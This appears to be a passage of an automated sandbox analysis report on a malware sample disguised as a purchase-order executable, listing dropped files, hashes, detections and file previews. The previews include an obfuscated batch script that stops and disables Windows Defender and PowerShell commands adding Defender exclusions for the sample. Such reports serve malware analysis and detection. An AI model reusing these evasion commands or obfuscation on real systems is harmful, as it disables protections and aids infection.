                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):326
                                                                                    Entropy (8bit):3.1192967794857243
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKjkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:IwTJrkPlE99SNxAhUe0ht
                                                                                    MD5:867208FDC0011BB0AAD04D0F71742310
                                                                                    SHA1:0F84E3ADACBAFE22A60258CBD0E55F52D0182F52
                                                                                    SHA-256:D3126C132F43D87523FD33D729EC3885ACD6AD5557D9056E447EBB0FE3F44B66
                                                                                    SHA-512:E5F073C2625506540A70A1827CA6E49392071717A7D9B6E645E7CB85C545BECC0279E33DE26205DF953C4999AEC645199FDA5B6F5A05582C7863FFF88271ED7F
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):14734
                                                                                    Entropy (8bit):4.993014478972177
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):22336
                                                                                    Entropy (8bit):5.600727062315433
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ltCDX0qZhF4/RY4Kn4jultI2D7Y9gxSJUeRe1BMrmb4SRV7rSLkC564I+pzg:0fFiu4K4CltJ3xXeNqFivE
                                                                                    MD5:73198456EC9CD93402A12C67F75EEBD5
                                                                                    SHA1:8A2B76B9D5F123ABE2F1F275AFAD29E5F5D2A9C4
                                                                                    SHA-256:D658934AD7CC52739BA1A2808A53EDEAA5F3C227C8192FF9597F848AF26B8871
                                                                                    SHA-512:A63A63DA0AF86F295BE0D58ADE3738C956FDE8B3EEE41A5DE76E9AFEA1C9034F42982D1660EA6FB080AE682008D1FE666DFA4B73E61552A9110B1A50353C628B
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                     • Filename: RFQ-034.exe, Detection: malicious
                                                                                     • Filename: Payment Slip.exe, Detection: malicious
                                                                                     • Filename: Revised Invoice No CU 7035.exe, Detection: malicious
                                                                                     • Filename: Sales_Order description.exe, Detection: malicious
                                                                                     • Filename: Outstanding invoices.exe, Detection: malicious
                                                                                     • Filename: Q88_Bulk Carrier.exe, Detection: malicious
                                                                                     • Filename: Payment _Slip copy.exe, Detection: malicious
                                                                                     • Filename: MV. HUA KAI V-2023.exe, Detection: malicious
                                                                                     • Filename: Order_April shipment.exe, Detection: malicious
                                                                                     • Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious
                                                                                     • Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious
                                                                                     • Filename: TT SWIFT COPY.exe, Detection: malicious
                                                                                     • Filename: PO75773937475895377.exe, Detection: malicious
                                                                                     • Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious
                                                                                     • Filename: Download Report.06.05.2021.exe, Detection: malicious
                                                                                     • Filename: Outstanding invoices.exe, Detection: malicious
                                                                                     • Filename: IMG_767893434432.exe, Detection: malicious
                                                                                     • Filename: VMtEguRH.exe, Detection: malicious
                                                                                     • Filename: SHIPPING DOCS - MV. SN QUEEN.exe, Detection: malicious
                                                                                     • Filename: MT CAPE AZALEA V219 PENAVICO 13-10-20.exe, Detection: malicious
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_autfnfbp.5ke.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dva0twzw.csn.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu12tuhx.b3d.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5lfjoqp.nj0.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                     • Antivirus: Metadefender, Detection: 3%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                     • Antivirus: Metadefender, Detection: 3%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32008
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    MD5:27233176A2A979195B01A53EC16C7631
                                                                                    SHA1:0EF424D2000F18E6B83473535BF85D22ED9AB79B
                                                                                    SHA-256:397A62FC978F7A97A87CAAF9C35E98E4A053DE4E786BEEE73A6C1AC0E99C9FC9
                                                                                    SHA-512:F8A620CA97069FA352621BB76C1C83BDEBB7692F0B80DE2E9D273EBB718D4D4BA412F2B057580023BD646DA09647D82E035F6C2AD28E59200B7433FD1AB2D0E7
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 15%
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.dfbKEN5N.20210408122415.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.399277409284378
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZVhtNxqDo1ZeZFhtNxqDo1ZtMGkjZWhtNxqDo1ZQ100DZU:u
                                                                                    MD5:B240F22E63DF44CA4B62678B85131460
                                                                                    SHA1:C119F7AAAB0B4B6446C09C72634F7944540742E4
                                                                                    SHA-256:94293DB0624CC339E38D1231CA91500CAC8F27911A4409441F69EE1B2077782B
                                                                                    SHA-512:E66C91C83D3AA181E1914D0759B936E4EAA38E2B97677564963D071CE13C97B94FB5CA2CAAD5AFE56CD0E715F88A8B0A71A888B8425D42506B6D68588F7E395B
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122441..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 3636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122441..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122931..Username: computer\user..RunA
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.ku7owyer.20210408122414.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.400354439564955
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZYhtNcqDo1Z5ZchtNcqDo1ZqMGkjZmhtNcqDo1Zj100/Z8:Y
                                                                                    MD5:360118D3E5E153530C9CF66B5A41EFFB
                                                                                    SHA1:93A5D02A88AC85B0C6A71B509455F0D9A1605A47
                                                                                    SHA-256:A52C0F3D078CB67B58D27BC1A139A66965557978522977DE39EF408F7B060DEE
                                                                                    SHA-512:060F0692A71A5BF4CB43A2952A168D96D0EA2B6249DBB650FCBCB72B26D2F755DE2CA20FDAA34AEEC13D782C3F5F8731844FB8C184B3D368CD568D60B03C5902
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 5828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122729..Username: computer\user..RunA
                                                                                    C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5128155
                                                                                    Entropy (8bit):3.033446165324156
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:yKhvmsqbzKhvmsqbpedqCzKhvmsqbpedqCt:U
                                                                                    MD5:14F9C1984DB22EF66B73F7818CCD792A
                                                                                    SHA1:DD973A3668A9B7C5D505EF132D191B42BCDF8879
                                                                                    SHA-256:37DB6E90DF6101E3FD7D1DC2A0FC476EE0EB3AD7FD50AFFD8A89E447668758F2
                                                                                    SHA-512:B95110CBAC27CDCCCB1A8A320AB04EF8341BA79CAEA28DC4FA3647C53AE35A645225C97D3384D3750B7DB8E6E46E9DF9887A34CDFACF317B64CAE07B3D511E47
                                                                                    Malicious:false
                                                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 102 10 0 0 6 0 0 0 0 0 0 94 133 10 0 0 32 0 0 0 160 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 10 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 4 133 10 0 87 0 0 0 0 160 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 10 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 100 101 10 0 0 32 0 0 0 102 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 9

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:08042021New-PurchaseOrder.exe
                                                                                    File size:32008
                                                                                    MD5:27233176a2a979195b01a53ec16c7631
                                                                                    SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
                                                                                    SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
                                                                                    SHA512:f8a620ca97069fa352621bb76c1c83bdebb7692f0b80de2e9d273ebb718d4d4ba412f2b057580023bd646da09647d82e035f6c2ad28e59200b7433fd1ab2d0e7
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x407d7e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
